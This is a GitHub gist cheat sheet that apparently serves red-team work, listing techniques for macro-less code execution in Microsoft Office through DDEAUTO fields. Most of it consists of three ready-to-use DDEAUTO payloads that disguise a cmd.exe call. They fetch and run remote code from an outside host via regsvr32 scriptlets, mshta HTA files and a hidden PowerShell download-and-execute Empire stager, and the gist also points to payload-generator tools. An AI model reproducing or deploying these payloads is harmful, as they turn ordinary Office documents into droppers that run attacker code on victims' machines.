Skip to content

Instantly share code, notes, and snippets.

@mgeeky
Created February 2, 2018 00:08
Show Gist options
  • Save mgeeky/981213b4c73093706fc2446deaa5f0c5 to your computer and use it in GitHub Desktop.
Save mgeeky/981213b4c73093706fc2446deaa5f0c5 to your computer and use it in GitHub Desktop.
Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet

Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet

  • Using regsvr32 *.sct files technique:
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data   || regsvr32 /s /n /u /i:http://192.168.56.101/empire2.sct scrobj.dll"
  • Using HTA files technique:
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data   || mshta http://192.168.56.101/poc.hta"
  • Method from Empire - unfortunately unable to hide 'powershell.exe -NoP -sta -NonI' sequence
DDEAUTO C:\\Microsoft\\Programs\\Office\\MSWord.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/k  powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://192.168.56.101/default.ps1');powershell -noP -sta -w 1 -enc $e "
  • CactusTorch DDE can also generate files in JS and VBS formats. They will utilize cscript as a file interpreter.

  • Another option is to use scripts by Dominic Spinosa found here

  • Another option is to stick with Unicorn by Dave Kennedy

Sources

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment